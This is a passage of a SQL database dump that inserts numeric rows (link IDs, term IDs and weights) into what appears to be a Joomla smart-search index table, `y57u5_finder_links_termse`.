(259, 173810, 1.00331),
(260, 173810, 1.00331),
(259, 173811, 1.12),
(260, 173811, 1.12),
(259, 173812, 0.98),
(260, 173812, 0.98),
(272, 173812, 0.98),
(280, 173812, 0.98),
(259, 173813, 1.05),
(260, 173813, 1.05),
(259, 173814, 1.14331),
(260, 173814, 1.14331),
(259, 173815, 1.07331),
(259, 173816, 1.28331),
(259, 173817, 1.02669),
(260, 173817, 1.02669),
(261, 173817, 1.02669),
(259, 173818, 0.95669),
(260, 173818, 0.95669),
(292, 173818, 0.95669),
(259, 173819, 0.91),
(260, 173819, 0.91),
(259, 173820, 1.02669),
(260, 173820, 1.02669),
(259, 173821, 0.91),
(260, 173821, 0.91),
(268, 173821, 0.91),
(259, 173822, 1.02669),
(260, 173822, 1.02669),
(259, 173823, 1.02669),
(260, 173823, 1.02669),
(245, 173824, 0.93331),
(259, 173824, 0.93331),
(260, 173824, 0.93331),
(259, 173825, 0.95669),
(260, 173825, 0.95669),
(259, 173826, 0.95669),
(260, 173826, 0.95669),
(265, 173826, 0.95669),
(266, 173826, 0.95669),
(288, 173826, 0.95669),
(259, 173827, 0.91),
(260, 173827, 0.91),
(259, 173828, 1.05),
(260, 173828, 1.05),
(259, 173829, 0.84),
(260, 173829, 0.84),
(259, 173830, 0.95669),
(260, 173830, 0.95669),
(259, 173831, 0.88669),
(260, 173831, 0.88669),
(259, 173832, 1.09669),
(260, 173832, 1.09669),
(259, 173833, 0.98),
(260, 173833, 0.98),
(259, 173834, 1.09669),
(260, 173834, 1.09669),
(259, 173835, 1.02669),
(260, 173835, 1.02669),
(259, 173836, 0.98),
(260, 173836, 0.98),
(259, 173837, 0.98),
(260, 173837, 0.98),
(259, 173838, 0.88669),
(260, 173838, 0.88669),
(274, 173838, 0.88669),
(259, 173839, 1.00331),
(260, 173839, 1.00331),
(259, 173840, 1.77338),
(260, 173840, 1.77338),
(259, 173841, 0.98),
(260, 173841, 0.98),
(259, 173842, 1.09669),
(260, 173842, 1.09669),
(259, 173843, 1.02669),
(260, 173843, 1.02669),
(259, 173844, 0.23331),
(260, 173844, 0.23331),
(265, 173844, 0.23331),
(266, 173844, 0.23331),
(259, 173845, 1.02669),
(260, 173845, 1.02669),
(259, 173846, 1.09669),
(260, 173846, 1.09669),
(259, 173847, 1.96),
(260, 173847, 1.96),
(259, 173848, 1.19),
(260, 173848, 1.19),
(259, 173849, 1.26),
(260, 173849, 1.26),
(259, 173850, 0.98),
(260, 173850, 0.98),
(259, 173851, 1.07331),
(260, 173851, 1.07331),
(259, 173852, 3.15),
(260, 173852, 3.15),
(259, 173853, 2.00662),
(260, 173853, 2.00662),
(259, 173854, 1.14331),
(260, 173854, 1.14331),
(259, 173855, 1.16669),
(260, 173855, 1.16669),
(259, 173856, 1.91338),
(260, 173856, 1.91338),
(259, 173857, 1.14331),
(260, 173857, 1.14331),
(259, 173858, 1.09669),
(260, 173858, 1.09669),
(259, 173859, 1.02669),
(260, 173859, 1.02669),
(259, 173860, 1.12),
(260, 173860, 1.12),
(259, 173861, 1.00331),
(260, 173861, 1.00331),
(259, 173862, 1.07331),
(260, 173862, 1.07331),
(259, 173863, 1.07331),
(260, 173863, 1.07331),
(259, 173864, 1.16669),
(260, 173864, 1.16669),
(259, 173867, 0.95669),
(260, 173867, 0.95669),
(259, 173868, 1.07331),
(260, 173868, 1.07331),
(259, 173869, 0.98),
(260, 173869, 0.98),
(259, 173870, 1.09669),
(260, 173870, 1.09669),
(259, 173871, 0.42),
(260, 173871, 0.42),
(259, 173872, 1.00331),
(260, 173872, 1.00331),
(259, 173873, 1.16669),
(260, 173873, 1.16669),
(259, 173874, 0.84),
(260, 173874, 1.26),
(259, 173875, 1.12),
(260, 173875, 1.12),
(259, 173876, 1.23669),
(260, 173876, 1.23669),
(259, 173877, 1.02669),
(260, 173877, 2.05338),
(259, 173878, 1.23669),
(260, 173878, 2.47338),
(259, 173879, 1.00331),
(260, 173879, 1.00331),
(259, 173880, 0.28),
(260, 173880, 0.28),
(259, 173881, 0.93331),
(260, 173881, 0.93331),
(259, 173882, 1.05),
(260, 173882, 1.05),
(261, 176046, 0.98),
(274, 176046, 0.98),
(261, 176055, 0.98),
(292, 176055, 0.98),
(306, 176055, 0.98),
(275, 176055, 1.96),
(261, 176062, 1.00331),
(270, 176062, 1.00331),
(301, 176062, 1.00331),
(261, 176090, 0.93331),
(273, 176090, 0.93331),
(178, 176644, 0.88669),
(244, 176644, 0.88669),
(178, 176652, 0.91),
(244, 176652, 0.91),
(244, 177116, 0.88669),
(273, 177116, 0.88669),
(244, 177125, 0.95669),
(275, 177125, 0.95669),
(174, 177135, 0.98),
(244, 177135, 0.98),
(272, 177135, 0.98),
(280, 177135, 0.98),
(174, 177136, 1.05),
(244, 177136, 1.05),
(178, 177141, 0.98),
(244, 177141, 0.98),
(244, 177146, 1.16669),
(264, 177146, 1.16669),
(262, 177156, 0.98),
(244, 177156, 1.96),
(244, 177158, 0.93331),
(248, 177158, 0.93331),
(269, 177158, 0.93331),
(306, 177158, 2.79993),
(244, 177198, 0.95669),
(247, 177198, 0.95669),
(244, 177203, 0.84),
(249, 177203, 0.84),
(245, 178881, 0.23331),
(248, 178881, 0.23331),
(245, 178884, 0.23331),
(247, 178884, 0.23331),
(248, 178884, 0.23331),
(245, 178891, 0.98),
(246, 178891, 0.98),
(245, 178892, 1.05),
(246, 178892, 1.05),
(245, 178894, 1.05),
(249, 178894, 1.05),
(245, 178897, 0.91),
(262, 178897, 0.91),
(272, 178897, 0.91),
(275, 178897, 0.91),
(280, 178897, 0.91),
(305, 178897, 0.91),
(245, 178905, 0.88669),
(272, 178905, 0.88669),
(280, 178905, 0.88669),
(246, 182716, 0.88669),
(262, 182716, 0.88669),
(306, 182716, 0.88669),
(259, 183124, 0.93331),
(260, 183124, 0.93331),
(178, 185203, 0.14),
(294, 185203, 0.14),
(262, 185203, 0.74),
(174, 186103, 0.98),
(262, 186103, 0.98),
(159, 189273, 1.12),
(159, 189278, 8.36019),
(161, 189303, 2.4666),
(161, 189304, 2.9334),
(161, 189305, 0.21),
(161, 189306, 0.84),
(161, 189307, 0.88669),
(161, 189472, 0.46669),
(161, 189473, 1.14331),
(161, 189474, 1.21331),
(161, 189475, 0.88669),
(178, 189475, 0.88669),
(304, 189475, 0.88669),
(161, 189476, 0.98),
(304, 189476, 0.98),
(161, 189477, 0.32669),
(161, 189478, 1.05),
(161, 189479, 1.21331),
(161, 189480, 0.37331),
(161, 189481, 1.05),
(161, 189482, 1.12),
(161, 189483, 0.37331),
(264, 189483, 0.37331),
(161, 189484, 1.05),
(161, 189485, 1.33),
(161, 189486, 0.93331),
(161, 189487, 1.14331),
(161, 189488, 1.02669),
(161, 189489, 1.28331),
(161, 189766, 0.56),
(161, 189767, 1.12),
(161, 189768, 1.23669),
(161, 189769, 0.95669),
(161, 189770, 1.02669),
(161, 189771, 0.18669),
(161, 189772, 0.91),
(161, 189773, 1.12),
(161, 189774, 0.95669),
(161, 189775, 1.00331),
(161, 189776, 8.93019),
(161, 189777, 0.56),
(161, 189778, 1.14331),
(161, 189779, 1.33),
(161, 189780, 0.74662),
(161, 189781, 0.98),
(161, 189782, 1.12),
(161, 189783, 1.02669),
(161, 189784, 1.16669),
(161, 189785, 0.98),
(161, 189786, 1.05),
(161, 189787, 0.95669),
(161, 189788, 1.09669),
(161, 189789, 0.95669),
(161, 189790, 1.09669),
(161, 189791, 0.79331),
(161, 189792, 0.95669),
(161, 189793, 0.98),
(161, 189794, 1.07331),
(161, 189795, 0.84),
(161, 189796, 0.95669),
(161, 189797, 0.84),
(161, 189798, 1.02669),
(161, 189799, 0.37331),
(161, 189800, 1.07331),
(161, 189801, 1.26),
(161, 189802, 0.32669),
(295, 189802, 0.32669),
(161, 189803, 1.02669),
(161, 189804, 1.19),
(161, 189805, 0.46669),
(161, 189806, 1.05),
(161, 189807, 1.19),
(174, 191662, 1.02669),
(193, 191662, 1.02669),
(193, 191665, 1.02669),
(249, 191665, 1.02669),
(178, 191670, 1.00331),
(193, 191670, 2.00662),
(193, 191721, 0.91),
(264, 191721, 0.91),
(304, 191721, 0.91),
(174, 191735, 0.98),
(193, 191735, 0.98),
(174, 191776, 0.95669),
(193, 191776, 0.95669),
(306, 191776, 0.95669),
(178, 192446, 0.14),
(246, 192446, 0.74),
(246, 192449, 0.14),
(288, 192449, 0.14),
(306, 192449, 0.14),
(265, 192449, 0.28),
(266, 192449, 0.28),
(178, 192449, 0.56),
(174, 192449, 0.74),
(168, 192460, 0.21),
(246, 192460, 0.21),
(246, 192619, 0.32669),
(247, 192619, 0.32669),
(248, 192619, 0.32669),
(168, 192970, 0.86331),
(246, 192970, 0.86331),
(178, 192976, 0.86331),
(246, 192976, 2.58993),
(246, 193000, 0.28),
(267, 193000, 0.28),
(268, 193000, 0.28),
(304, 193000, 0.28),
(246, 193007, 0.86331),
(263, 193007, 0.86331),
(168, 197561, 0.81669),
(168, 197562, 0.93331),
(168, 197563, 0.77),
(168, 197564, 0.86331),
(168, 197565, 0.81669),
(168, 197566, 0.88669),
(168, 197567, 0.91),
(168, 197568, 1.00331),
(168, 197569, 0.88669),
(168, 197570, 1.05),
(168, 197571, 0.84),
(168, 197572, 0.91),
(168, 197573, 0.91),
(168, 197574, 0.98),
(168, 197575, 0.88669),
(168, 197576, 0.95669),
(178, 197577, 0.14),
(168, 197577, 0.74),
(168, 197578, 2.6),
(168, 197583, 0.86331),
(168, 197584, 0.93331),
(168, 197585, 0.93331),
(168, 197586, 1.19),
(168, 197785, 1.72662),
(275, 197785, 7.89312),
(168, 197786, 0.98),
(275, 197786, 8.96),
(168, 197787, 1.02669),
(168, 197788, 0.42),
(265, 197788, 0.42),
(266, 197788, 0.42),
(292, 197788, 0.42),
(168, 197789, 1.00331),
(168, 197790, 1.12),
(168, 197791, 0.95669),
(168, 197792, 1.05),
(168, 197793, 0.81669),
(168, 197794, 0.93331),
(168, 197795, 0.14),
(168, 197796, 0.81669),
(168, 197797, 0.91),
(168, 198260, 3.45324),
(168, 198261, 0.95669),
(168, 198262, 2.87007),
(168, 198263, 0.88669),
(168, 198264, 1.00331),
(168, 198265, 0.93331),
(168, 198266, 1.02669),
(168, 198267, 0.98),
(168, 198268, 1.14331),
(168, 198269, 0.95669),
(168, 198270, 1.09669),
(168, 198271, 0.95669),
(290, 198271, 0.95669),
(168, 198272, 0.95669),
(168, 198273, 0.93331),
(168, 198274, 1.00331),
(168, 198275, 0.93331),
(168, 198276, 1.00331),
(168, 198277, 0.98),
(168, 198278, 0.93331),
(168, 198279, 1.00331),
(168, 198280, 1.14331),
(168, 198281, 0.98),
(168, 198282, 1.00331),
(168, 198283, 0.88669),
(168, 198284, 1.07331),
(168, 198285, 0.93331),
(168, 198286, 1.00331),
(168, 198287, 0.98),
(168, 198288, 1.05),
(168, 198289, 0.95669),
(168, 198290, 1.07331),
(168, 198291, 0.93331),
(168, 198292, 1.02669),
(168, 198293, 0.86331),
(168, 198294, 0.95669),
(168, 198295, 0.91),
(168, 198296, 0.93331),
(168, 198297, 0.98),
(168, 198298, 0.93331),
(168, 198299, 0.98),
(168, 198300, 1.91338),
(168, 198301, 0.95669),
(305, 198301, 0.95669),
(168, 198302, 0.98),
(168, 198303, 1.09669),
(168, 198304, 0.95669),
(168, 198305, 0.86331),
(305, 198305, 0.86331),
(168, 198306, 0.98),
(168, 198307, 0.91),
(168, 198308, 1.12),
(168, 198309, 0.95669),
(168, 198310, 1.05),
(168, 198311, 1.14331),
(168, 198312, 0.86331),
(168, 198313, 1.00331),
(174, 214912, 2.5334),
(174, 214913, 3.2666),
(174, 214914, 0.81669),
(174, 214915, 0.98),
(174, 214922, 0.79331),
(174, 214923, 0.91),
(174, 215248, 0.86331),
(174, 215249, 0.95669),
(174, 215250, 0.95669),
(174, 215251, 1.05),
(174, 215252, 0.14),
(275, 215252, 0.14),
(249, 215252, 0.42),
(174, 215253, 0.84),
(174, 215254, 0.88669),
(174, 215255, 0.88669),
(174, 215256, 1.02669),
(174, 215257, 0.91),
(174, 215258, 1.05),
(174, 215259, 0.98),
(174, 215260, 1.09669),
(174, 215261, 0.37331),
(174, 215262, 0.98),
(174, 215263, 1.07331),
(174, 215264, 0.93331),
(174, 215265, 1.07331),
(174, 215266, 0.95669),
(174, 215267, 1.05),
(174, 215268, 0.91),
(268, 215268, 0.91),
(174, 215269, 1.02669),
(174, 215270, 1.05),
(174, 215271, 1.14331),
(174, 215272, 1.14331),
(174, 215273, 1.26),
(174, 215274, 1.02669),
(267, 215274, 1.02669),
(174, 215275, 1.14331),
(174, 215276, 0.23331),
(174, 215277, 0.93331),
(174, 215278, 1.02669),
(174, 215279, 0.84),
(174, 215280, 0.88669),
(174, 215281, 0.86331),
(174, 215282, 0.95669),
(174, 215802, 0.88669),
(174, 215803, 1.07331),
(174, 215804, 0.84),
(174, 215805, 1.00331),
(174, 215806, 1.00331),
(174, 215807, 0.98),
(174, 215808, 1.07331),
(174, 215809, 0.95669),
(174, 215810, 1.02669),
(174, 215811, 1.00331),
(174, 215812, 1.23669),
(174, 215813, 1.02669),
(174, 215814, 1.02669),
(174, 215815, 1.02669),
(174, 215816, 0.93331),
(174, 215817, 1.02669),
(174, 215818, 1.02669),
(174, 215819, 1.82),
(174, 215820, 2.05338),
(174, 215821, 1.05),
(174, 215822, 1.02669),
(265, 215822, 1.02669),
(266, 215822, 1.02669),
(174, 215823, 0.93331),
(247, 215823, 8.53312),
(174, 215824, 1.05),
(174, 215825, 1.00331),
(174, 215826, 0.95669),
(174, 215827, 0.91),
(174, 215828, 0.98),
(174, 215829, 1.02669),
(275, 215830, 0.98),
(288, 215830, 0.98),
(174, 215830, 1.96),
(174, 215831, 1.09669),
(174, 215832, 1.26),
(174, 215833, 1.07331),
(275, 215833, 1.07331),
(305, 215833, 1.07331),
(174, 215834, 1.16669),
(174, 215835, 0.93331),
(174, 215836, 1.05),
(174, 215837, 1.91338),
(174, 215838, 1.00331),
(174, 215839, 1.96),
(174, 215840, 1.21331),
(174, 215841, 1.14331),
(174, 215842, 1.00331),
(174, 215843, 1.07331),
(174, 215844, 0.95669),
(306, 215844, 2.87007),
(174, 215845, 1.02669),
(306, 215845, 2.05338),
(174, 215846, 2.47338),
(174, 215847, 1.02669),
(174, 215848, 1.02669),
(174, 215849, 0.93331),
(174, 215850, 1.05),
(174, 215851, 0.93331),
(174, 215852, 1.00331),
(174, 215853, 1.00331),
(174, 215854, 1.09669),
(174, 215855, 1.09669),
(174, 215856, 1.19),
(174, 215857, 0.98),
(174, 215858, 1.07331),
(174, 215859, 1.00331),
(174, 215860, 1.09669),
(248, 215861, 0.95669),
(273, 215861, 0.95669),
(274, 215861, 0.95669),
(270, 215861, 1.91338),
(301, 215861, 1.91338),
(174, 215861, 3.82676),
(174, 215862, 1.05),
(174, 215863, 1.02669),
(174, 215864, 1.02669),
(174, 215865, 1.07331),
(270, 215865, 1.07331),
(301, 215865, 1.07331),
(174, 215866, 1.21331),
(174, 215867, 1.07331),
(174, 215868, 1.14331),
(174, 215869, 1.12),
(174, 215870, 1.23669),
(174, 215871, 1.00331),
(174, 215872, 1.12),
(174, 215873, 0.88669),
(174, 215874, 0.98),
(174, 215875, 0.91),
(174, 215876, 1.00331),
(174, 215877, 0.86331),
(174, 215878, 0.95669),
(174, 215879, 0.91),
(174, 215880, 1.00331),
(174, 215881, 1.72662),
(174, 215882, 1.96),
(174, 215883, 1.05),
(174, 215884, 1.12),
(174, 215885, 0.91),
(174, 215886, 1.02669),
(174, 215887, 1.00331),
(174, 215888, 0.95669),
(174, 215889, 0.98),
(174, 215890, 0.91),
(174, 215891, 1.07331),
(174, 215892, 0.95669),
(174, 215893, 1.07331),
(174, 215894, 1.14331),
(174, 215895, 1.09669),
(174, 215896, 0.93331),
(174, 215897, 1.05),
(174, 215898, 1.02669),
(174, 215899, 1.12),
(174, 215900, 1.00331),
(174, 215901, 1.12),
(174, 215902, 0.88669),
(248, 215902, 0.88669),
(174, 215903, 1.00331),
(174, 215904, 0.98),
(174, 215905, 1.14331),
(174, 215906, 0.98),
(174, 215907, 0.95669),
(174, 215908, 1.02669),
(174, 215909, 0.95669),
(174, 215910, 1.00331),
(174, 215911, 0.91),
(174, 215912, 1.00331),
(174, 215913, 1.07331),
(174, 215914, 1.09669),
(174, 215915, 1.07331),
(174, 215916, 1.02669),
(174, 215917, 1.02669),
(174, 215918, 1.02669),
(174, 215919, 0.91),
(174, 215920, 1.02669),
(174, 215921, 0.95669),
(174, 215922, 1.02669),
(174, 215923, 1.96),
(174, 215924, 1.07331),
(174, 215925, 1.07331),
(174, 215926, 1.05),
(174, 215927, 1.09669),
(174, 215928, 0.93331),
(174, 215929, 1.02669),
(174, 215930, 0.93331),
(174, 215931, 1.02669),
(174, 215932, 0.91),
(174, 215933, 1.05),
(174, 215934, 0.95669),
(265, 215934, 0.95669),
(266, 215934, 0.95669),
(174, 215935, 1.09669),
(265, 215935, 1.09669),
(266, 215935, 1.09669),
(174, 215936, 0.93331),
(174, 215937, 1.16669),
(174, 215938, 0.93331),
(174, 215939, 1.05),
(174, 215940, 1.05),
(174, 215941, 0.91),
(174, 215942, 1.02669),
(174, 215943, 0.98),
(174, 215944, 0.95669),
(174, 215945, 0.95669),
(174, 215946, 0.98),
(174, 215947, 0.98),
(174, 215948, 1.00331),
(174, 215949, 1.00331),
(174, 215950, 0.95669),
(174, 215951, 1.14331),
(174, 215952, 1.00331),
(174, 215953, 0.95669),
(174, 215954, 1.00331),
(174, 215955, 0.95669),
(174, 215956, 1.05),
(174, 215957, 0.91),
(174, 215958, 1.12),
(174, 215959, 1.86662),
(174, 215960, 1.05),
(174, 215961, 1.00331),
(174, 215962, 0.65338),
(174, 215963, 0.95669),
(174, 215964, 1.05),
(174, 215965, 0.98),
(174, 215966, 1.05),
(174, 215967, 1.77338),
(174, 215968, 1.12),
(174, 215969, 1.09669),
(249, 217223, 0.42),
(262, 217223, 0.84),
(262, 217787, 0.88669),
(267, 217787, 0.88669),
(288, 217787, 0.88669),
(262, 217794, 1.02669),
(263, 217794, 1.02669),
(262, 217844, 0.91),
(264, 217844, 1.82),
(262, 217870, 0.86331),
(268, 217870, 0.86331),
(262, 217871, 0.93331),
(268, 217871, 0.93331),
(178, 221133, 0.79331),
(178, 221134, 0.98),
(178, 221135, 0.79331),
(178, 221136, 0.93331),
(178, 221137, 0.79331);
INSERT INTO `y57u5_finder_links_termse` (`link_id`, `term_id`, `weight`) VALUES
(178, 221138, 0.84),
(178, 221139, 0.86331),
(178, 221140, 1.00331),
(178, 221141, 0.84),
(178, 221142, 0.91),
(178, 221143, 0.79331),
(178, 221144, 0.88669),
(178, 221145, 0.81669),
(178, 221146, 0.93331),
(178, 221147, 0.79331),
(178, 221148, 0.84),
(178, 221149, 0.81669),
(178, 221150, 0.88669),
(178, 221151, 0.81669),
(178, 221152, 0.88669),
(178, 221153, 0.81669),
(178, 221154, 0.91),
(178, 221155, 0.93331),
(178, 221156, 1.00331),
(178, 221157, 0.84),
(178, 221158, 0.95669),
(178, 221159, 0.84),
(178, 221160, 0.95669),
(178, 221161, 0.84),
(178, 221162, 0.91),
(178, 221163, 0.74),
(178, 221164, 2.8666),
(178, 221165, 3.6),
(178, 221182, 0.77),
(178, 221183, 0.86331),
(178, 221184, 0.14),
(292, 221184, 0.74),
(178, 221185, 0.81669),
(178, 221186, 0.86331),
(178, 221187, 0.14),
(294, 221187, 0.74),
(178, 221188, 0.79331),
(178, 221189, 0.93331),
(178, 221693, 0.14),
(178, 221694, 0.88669),
(178, 221695, 0.95669),
(178, 221696, 0.23331),
(288, 221696, 0.23331),
(178, 221697, 1.00331),
(178, 221698, 1.21331),
(178, 221699, 0.91),
(178, 221700, 1.07331),
(178, 221701, 1.00331),
(178, 221702, 0.32669),
(178, 221703, 0.93331),
(178, 221704, 1.09669),
(178, 221705, 0.95669),
(178, 221706, 0.88669),
(178, 221707, 0.95669),
(178, 221708, 1.02669),
(178, 221709, 1.12),
(178, 221710, 0.37331),
(178, 221711, 1.00331),
(178, 221712, 1.19),
(178, 221713, 0.98),
(178, 221714, 1.05),
(178, 221715, 0.14),
(178, 221716, 0.86331),
(178, 221717, 1.07331),
(178, 221718, 0.86331),
(178, 221719, 0.98),
(178, 221720, 0.93331),
(178, 221721, 1.09669),
(178, 221722, 0.32669),
(178, 221723, 0.93331),
(178, 221724, 1.02669),
(178, 221725, 0.95669),
(178, 221726, 1.02669),
(178, 221727, 0.93331),
(178, 221728, 1.07331),
(178, 221729, 1.02669),
(178, 221730, 1.12),
(178, 221731, 1.21331),
(178, 221732, 1.12),
(178, 221733, 0.27993),
(178, 221734, 0.79331),
(178, 221735, 0.98),
(178, 221736, 0.79331),
(178, 221737, 0.86331),
(178, 221738, 0.81669),
(178, 221739, 0.88669),
(178, 221740, 0.18669),
(178, 221741, 0.86331),
(178, 221742, 0.91),
(178, 221743, 1.09669),
(178, 221744, 1.16669),
(178, 221745, 0.88669),
(178, 221746, 0.98),
(178, 221747, 0.91),
(178, 221748, 1.02669),
(178, 222820, 0.86331),
(178, 222821, 1.00331),
(178, 222822, 0.88669),
(270, 222822, 0.88669),
(301, 222822, 0.88669),
(178, 222823, 1.00331),
(178, 222824, 1.00331),
(178, 222825, 1.14331),
(178, 222826, 0.91),
(178, 222827, 1.02669),
(178, 222828, 0.98),
(178, 222829, 1.05),
(178, 222830, 0.95669),
(248, 222830, 1.91338),
(178, 222831, 1.05),
(178, 222832, 0.86331),
(306, 222832, 0.86331),
(178, 222833, 0.98),
(178, 222834, 1.02669),
(178, 222835, 1.09669),
(178, 222836, 1.07331),
(178, 222837, 1.14331),
(178, 222838, 2.14662),
(178, 222839, 1.07331),
(178, 222840, 1.07331),
(178, 222841, 0.95669),
(178, 222842, 1.07331),
(178, 222843, 0.88669),
(178, 222844, 0.95669),
(178, 222845, 0.93331),
(178, 222846, 1.82),
(178, 222847, 2.00662),
(178, 222848, 0.95669),
(178, 222849, 1.02669),
(178, 222850, 1.96),
(178, 222851, 0.98),
(178, 222852, 0.95669),
(178, 222853, 1.02669),
(178, 222854, 0.98),
(178, 222855, 1.12),
(178, 222856, 0.93331),
(178, 222857, 1.07331),
(178, 222858, 0.91),
(178, 222859, 1.00331),
(178, 222860, 0.91),
(178, 222861, 0.98),
(178, 222862, 2.58993),
(178, 222863, 1.00331),
(178, 222864, 0.91),
(178, 222865, 1.00331),
(178, 222866, 0.98),
(178, 222867, 1.86662),
(178, 222868, 1.02669),
(178, 222869, 0.98),
(178, 222870, 1.07331),
(178, 222871, 1.91338),
(178, 222872, 2.14662),
(178, 222873, 2.94),
(178, 222874, 1.09669),
(178, 222875, 1.16669),
(178, 222876, 1.09669),
(178, 222877, 1.05),
(178, 222878, 0.93331),
(178, 222879, 1.00331),
(178, 222880, 0.93331),
(178, 222881, 1.00331),
(178, 222882, 0.88669),
(178, 222883, 1.00331),
(178, 222884, 0.93331),
(178, 222885, 1.00331),
(178, 222886, 0.86331),
(178, 222887, 0.93331),
(178, 222888, 0.95669),
(178, 222889, 0.93331),
(178, 222890, 1.05),
(178, 222891, 0.93331),
(178, 222892, 0.98),
(178, 222893, 0.91),
(273, 222893, 0.91),
(178, 222894, 0.98),
(274, 222895, 0.88669),
(178, 222895, 1.77338),
(178, 222896, 1.02669),
(178, 222897, 1.02669),
(178, 222898, 0.88669),
(178, 222899, 0.93331),
(178, 222900, 1.02669),
(178, 222901, 1.09669),
(178, 222902, 0.88669),
(178, 222903, 1.02669),
(178, 222904, 0.91),
(178, 222905, 0.95669),
(178, 222906, 0.56),
(178, 222907, 1.09669),
(178, 222908, 1.21331),
(178, 222909, 0.93331),
(178, 222910, 0.98),
(178, 222911, 0.95669),
(178, 222912, 1.12),
(178, 222913, 0.95669),
(178, 222914, 1.05),
(178, 222915, 0.95669),
(178, 222916, 1.00331),
(178, 222917, 1.05),
(178, 222918, 0.88669),
(178, 222919, 1.05),
(178, 222920, 0.91),
(178, 222921, 1.00331),
(178, 222922, 0.56),
(178, 222923, 0.91),
(178, 222924, 1.02669),
(178, 222925, 0.88669),
(178, 222926, 0.95669),
(178, 222927, 1.82),
(178, 222928, 2.1),
(178, 222929, 1.02669),
(178, 222930, 0.93331),
(178, 222931, 1.07331),
(178, 222932, 0.46669),
(275, 222932, 0.46669),
(178, 222933, 0.98),
(178, 222934, 1.05),
(178, 222935, 0.98),
(178, 222936, 1.14331),
(178, 222937, 0.65338),
(178, 222938, 0.95669),
(178, 222939, 1.05),
(178, 222940, 0.95669),
(178, 222941, 1.07331),
(178, 222942, 1.07331),
(178, 222943, 1.19),
(178, 222944, 1.00331),
(178, 222945, 1.05),
(178, 222946, 1.00331),
(178, 222947, 0.98),
(178, 222948, 0.91),
(178, 222949, 1.02669),
(178, 222950, 0.93331),
(178, 222951, 1.05),
(178, 222952, 0.98),
(178, 222953, 1.12),
(178, 222954, 1.02669),
(178, 222955, 0.91),
(178, 222956, 1.02669),
(178, 222957, 0.95669),
(178, 222958, 1.05),
(178, 222959, 0.98),
(178, 222960, 1.07331),
(178, 222961, 2.05338),
(178, 222962, 2.38),
(178, 222963, 2.66007),
(178, 222964, 1.00331),
(178, 222965, 2.1),
(178, 222966, 1.05),
(178, 222967, 1.09669),
(178, 222968, 1.14331),
(178, 222969, 0.95669),
(178, 222970, 1.14331),
(178, 222971, 0.93331),
(178, 222972, 1.05),
(178, 222973, 1.07331),
(178, 222974, 2.1),
(178, 222975, 1.05),
(178, 222976, 1.14331),
(178, 222977, 0.91),
(178, 222978, 1.02669),
(178, 222979, 1.00331),
(178, 222980, 1.07331),
(178, 222981, 1.02669),
(178, 222982, 1.09669),
(178, 222983, 2.05338),
(178, 222984, 1.14331),
(178, 222985, 1.16669),
(178, 222986, 0.88669),
(178, 222987, 0.98),
(178, 222988, 0.93331),
(178, 222989, 1.14331),
(178, 222990, 0.88669),
(178, 222991, 0.98),
(178, 222992, 1.02669),
(178, 222993, 1.09669),
(178, 222994, 0.88669),
(178, 222995, 0.93331),
(178, 222996, 0.93331),
(178, 222997, 1.07331),
(178, 222998, 0.91),
(178, 222999, 0.95669),
(178, 223000, 1.05),
(178, 223001, 0.88669),
(178, 223002, 0.98),
(178, 223003, 1.05),
(178, 223004, 1.00331),
(178, 223005, 0.98),
(178, 223006, 1.05),
(178, 223007, 1.09669),
(178, 223008, 1.23669),
(178, 223009, 1.02669),
(178, 223010, 1.21331),
(178, 223011, 0.93331),
(178, 223012, 1.02669),
(178, 223013, 0.98),
(178, 223014, 1.09669),
(178, 223015, 0.86331),
(178, 223016, 1.12),
(178, 223017, 1.00331),
(178, 223018, 0.86331),
(178, 223019, 1.09669),
(178, 223020, 0.95669),
(178, 223021, 1.14331),
(178, 223022, 0.95669),
(178, 223023, 0.98),
(178, 223024, 0.84),
(178, 223025, 1.02669),
(178, 223026, 2.1),
(178, 223027, 1.05),
(178, 223028, 0.93331),
(178, 223029, 1.00331),
(178, 223030, 0.98),
(178, 223031, 0.81669),
(292, 223031, 0.81669),
(178, 223032, 0.95669),
(178, 223033, 1.96),
(178, 223034, 0.86331),
(178, 223035, 0.93331),
(178, 223036, 1.96),
(178, 223037, 0.84),
(178, 223038, 1.02669),
(178, 223039, 0.32669),
(178, 223040, 0.91),
(178, 223041, 1.05),
(178, 223042, 0.84),
(178, 223043, 2.00662),
(178, 223044, 2.38),
(178, 223045, 0.95669),
(178, 223046, 1.05),
(178, 223047, 0.98),
(178, 223048, 1.05),
(178, 223049, 0.32669),
(178, 223050, 1.05),
(178, 223051, 1.14331),
(178, 223052, 0.23331),
(178, 223053, 0.88669),
(178, 223054, 0.98),
(263, 227860, 0.93331),
(267, 227860, 0.93331),
(263, 227882, 1.00331),
(272, 227882, 1.00331),
(280, 227882, 1.00331),
(247, 228952, 1.07331),
(248, 228952, 1.07331),
(247, 228957, 0.42),
(249, 228957, 0.42),
(275, 229194, 0.88669),
(247, 229194, 2.66007),
(275, 229195, 0.95669),
(247, 229195, 2.87007),
(247, 229196, 0.91),
(248, 229196, 0.91),
(248, 233336, 0.21),
(249, 233336, 0.51),
(248, 233452, 0.37331),
(270, 233452, 0.37331),
(301, 233452, 0.37331),
(248, 233747, 0.98),
(273, 233747, 0.98),
(193, 238095, 0.84),
(193, 238096, 0.91),
(193, 238097, 0.84),
(193, 238098, 0.93331),
(193, 238099, 0.81669),
(193, 238100, 1.07331),
(193, 238101, 0.79331),
(193, 238102, 1.09669),
(193, 238103, 0.21),
(193, 238104, 0.91),
(193, 238105, 1.02669),
(193, 238108, 1.02669),
(193, 238109, 1.16669),
(193, 238110, 0.86331),
(193, 238111, 1.05),
(193, 238539, 0.42),
(193, 238540, 1.00331),
(193, 238541, 1.09669),
(193, 238542, 0.84),
(193, 238543, 0.95669),
(193, 238544, 0.88669),
(193, 238545, 1.02669),
(193, 238546, 0.56),
(193, 238547, 1.09669),
(193, 238548, 1.21331),
(193, 238549, 0.42),
(193, 238550, 1.00331),
(193, 238551, 1.14331),
(193, 238552, 0.42),
(193, 238553, 0.98),
(193, 238554, 1.12),
(193, 238555, 0.98),
(193, 238556, 0.93331),
(193, 238557, 1.07331),
(193, 238558, 1.02669),
(193, 238559, 1.09669),
(193, 238560, 0.91),
(269, 238560, 0.91),
(193, 238561, 1.02669),
(193, 238562, 0.56),
(193, 238563, 1.09669),
(193, 238564, 1.16669),
(193, 238565, 0.95669),
(193, 238566, 1.05),
(193, 238567, 0.51331),
(193, 238568, 1.12),
(193, 238569, 1.23669),
(193, 238570, 1.21338),
(193, 238571, 1.23669),
(193, 238572, 1.33),
(193, 238573, 1.28331),
(193, 238574, 1.4),
(193, 238575, 1.02669),
(193, 238576, 0.51331),
